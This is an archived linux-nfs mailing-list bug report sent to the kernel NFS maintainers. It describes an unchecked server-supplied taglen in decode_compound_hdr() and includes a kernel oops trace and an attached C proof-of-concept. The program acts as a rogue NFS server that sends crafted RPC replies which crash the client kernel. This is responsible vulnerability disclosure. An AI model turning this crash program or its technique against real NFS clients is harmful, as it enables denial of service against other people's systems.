NFS client RPC bug

public inbox for linux-nfs@vger.kernel.org
 help / color / mirror / Atom feed

From: rtm@csail.mit.edu
To: Trond Myklebust <trond.myklebust@hammerspace.com>,
	Anna Schumaker <anna.schumaker@netapp.com>
Cc: linux-nfs@vger.kernel.org
Subject: NFS client RPC bug
Date: Thu, 04 Nov 2021 16:10:38 -0400	[thread overview]
Message-ID: <7517.1636056638@crash.local> (raw)

[-- Attachment #1: Type: text/plain, Size: 3145 bytes --]

decode_compound_hdr() in fs/nfs/nfs4xdr.c adds the taglen supplied by
the server to a pointer and then dereferences it, but does not first
check taglen for sanity:

        p = xdr_inline_decode(xdr, 8);
        ...;
        hdr->taglen = be32_to_cpup(p);
        ...;
        p = xdr_inline_decode(xdr, hdr->taglen + 4);
        ...;
        p += XDR_QUADLEN(hdr->taglen);
        hdr->nops = be32_to_cpup(p);

The second xdr_inline_decode() limits the opportunities for an
attacker-controlled pointer dereference, but a taglen of 0xfffffffc
will cause a kernel page fault.

I've attached a program that tickles the bug on my kernel 5.15
machine:

# uname -a
Linux (none) 5.15.0-rc7-dirty #15 SMP Thu Nov 4 19:20:36 UTC 2021 riscv64 riscv64 riscv64 GNU/Linux
# cc nfs_1.c
# ./a.out
mount:mount.nfs: timeout set for Thu Jan  1 00:02:12 1970
mount.nfs: trying text-based options 'vers=4.2,addr=127.0.0.1,clientaddr=127.0.0.1'
accept returned 4
proc 0
proc 1
exception pc=0xffffffff8022dcd8 cause=d symbolic tval=0xffffffe102c5aad8
[   16.101267] Unable to handle kernel paging request at virtual address ffffffe102c5aad8
[   16.112762] Oops [#1]
[   16.116973] Modules linked in:
[   16.122429] CPU: 0 PID: 60 Comm: mount.nfs Not tainted 5.15.0-rc7-dirty #13
[   16.131634] Hardware name: ucbbar,riscvemu-bare (DT)
[   16.138694] epc : decode_compound_hdr+0x96/0x12e
[   16.146706]  ra : decode_compound_hdr+0x82/0x12e
[   16.154151] epc : ffffffff8022dcd8 ra : ffffffff8022dcc4 sp : ffffffd00057b6e0
...
[   16.272291] status: 0000000200000121 badaddr: ffffffe102c5aad8 cause: 000000000000000d
[   16.282369] [<ffffffff8022dcd8>] decode_compound_hdr+0x96/0x12e
[   16.290699] [<ffffffff80239c2a>] nfs4_xdr_dec_exchange_id+0x32/0x57e
[   16.299265] [<ffffffff8071af5c>] rpcauth_unwrap_resp_decode+0x12/0x1a
[   16.307926] [<ffffffff8071bc18>] rpcauth_unwrap_resp+0x12/0x1a
[   16.316196] [<ffffffff80711fb4>] call_decode+0x112/0x176
[   16.323488] [<ffffffff8071a498>] __rpc_execute+0x76/0x216
[   16.330751] [<ffffffff8071aab6>] rpc_execute+0x58/0x7e
[   16.337966] [<ffffffff80713340>] rpc_run_task+0x12c/0x16c
[   16.345113] [<ffffffff80224eba>] nfs4_run_exchange_id+0x1d8/0x262
[   16.353364] [<ffffffff80224f68>] _nfs4_proc_exchange_id+0x24/0x2ba
[   16.361556] [<ffffffff8022cfc4>] nfs4_proc_exchange_id+0x30/0x50
[   16.369829] [<ffffffff8023ea28>] nfs41_discover_server_trunking+0x1c/0xa8
[   16.378421] [<ffffffff80240d4e>] nfs4_discover_server_trunking+0x7c/0x1e8
[   16.386958] [<ffffffff802490fe>] nfs4_init_client+0x92/0xf6
[   16.394014] [<ffffffff80205412>] nfs_get_client+0x36a/0x394
[   16.401147] [<ffffffff8024882e>] nfs4_set_client+0xd6/0x13e
[   16.410346] [<ffffffff8024981a>] nfs4_create_server+0xb8/0x208
[   16.421493] [<ffffffff80241606>] nfs4_try_get_tree+0x16/0x4c
[   16.432759] [<ffffffff80218bac>] nfs_get_tree+0x34a/0x3ac
[   16.442283] [<ffffffff8012bce4>] vfs_get_tree+0x18/0x88
[   16.451889] [<ffffffff8014a28e>] path_mount+0x4f4/0x77a
[   16.461619] [<ffffffff8014a560>] do_mount+0x4c/0x7e
[   16.470833] [<ffffffff8014a912>] sys_mount+0xca/0x14e
[   16.480401] [<ffffffff80003046>] ret_from_syscall+0x0/0x2


[-- Attachment #2: nfs_1.c --]
[-- Type: application/octet-stream, Size: 2975 bytes --]

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>

unsigned long long aaa[] = {
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x300000000000000ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
};
int iii = 0;

int readn(int fd, char *buf, int n) {
  int orig = n;
  while(n > 0){
    int cc = read(fd, buf, n);
    if(cc <= 0) { perror("read"); return -1; }
    n -= cc;
    buf += cc;
  }
  return orig;
}

int
main(){
  struct rlimit r;
  r.rlim_cur = r.rlim_max = 0;
  setrlimit(RLIMIT_CORE, &r);

  int s = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in sin;
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(2049);
  if(bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0){
    perror("bind"); exit(1);
  }
  listen(s, 10);
  sync(); sleep(1); sleep(1); sleep(1);

  if(fork() == 0){
    if(system("echo -n mount: ; mount -v -t nfs 127.0.0.1:/tmp /mnt") == 0){
      system("echo -n ls: ; ls -l /mnt/. /mnt/z");
      system("echo -n echo: ; echo hi > /mnt/x");
      system("echo -n umount: ; umount /mnt");
    }
    exit(0);
  }

  if(fork() == 0){
#define NAA 64
    unsigned long long aa[NAA];
    for(int i = 0; i < NAA; i++) aa[i] = aaa[iii++];
    int ii = 0;

    socklen_t sinlen = sizeof(sin);
    int s1 = accept(s, (struct sockaddr *) &sin, &sinlen);
    printf("accept returned %d\n", s1);
    if(s1 < 0) { perror("accept"); exit(1); }
    close(s);
  
    while(1){
      unsigned int ilen;
      if(readn(s1, (char*)&ilen, 4) < 0) break;
      ilen = ntohl(ilen);
      ilen &= 0x7fffffff;
      char ibuf[1024];
      if(readn(s1, (char*)ibuf, ilen) < 0) break;
      int xid = *(int*)(ibuf+0);
      int proc = ntohl(*(int*)(ibuf+20));
      printf("proc %d\n", proc);
      
      char obuf[128];
      int olen = sizeof(obuf);
      int dummy = htonl(olen | 0x80000000);
      write(s1, &dummy, 4);
      memset(obuf, 0xff, sizeof(obuf));
      for(int i = 0; i+8 <= sizeof(obuf) && ii < NAA; i += 8)
        *(unsigned long long *)(obuf + i) ^= aa[ii++];
      *(int*)(obuf+0) = xid;
      *(int*)(obuf+4) = htonl(1); // REPLY
      *(int*)(obuf+8) = htonl(0); // MSG_ACCEPTED
      *(int*)(obuf+12) = htonl(0); // opaque_auth flavor = AUTH_NULL
      *(int*)(obuf+16) = htonl(0); // opaque_auth length
      *(int*)(obuf+20) = htonl(0); // SUCCESS
      if(write(s1, obuf, olen)<=0) perror("write");
    }
    exit(1);
  }
  close(s);
  sleep(7);
}

next             reply	other threads:[~2021-11-04 20:30 UTC|newest]

Thread overview: 3+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2021-11-04 20:10 rtm [this message]
2021-11-04 20:29 ` NFS client RPC bug Trond Myklebust
2021-11-04 20:36   ` rtm

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=7517.1636056638@crash.local \
    --to=rtm@csail.mit.edu \
    --cc=anna.schumaker@netapp.com \
    --cc=linux-nfs@vger.kernel.org \
    --cc=trond.myklebust@hammerspace.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link

Be sure your reply has a Subject: header at the top and a blank line before the message body.

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox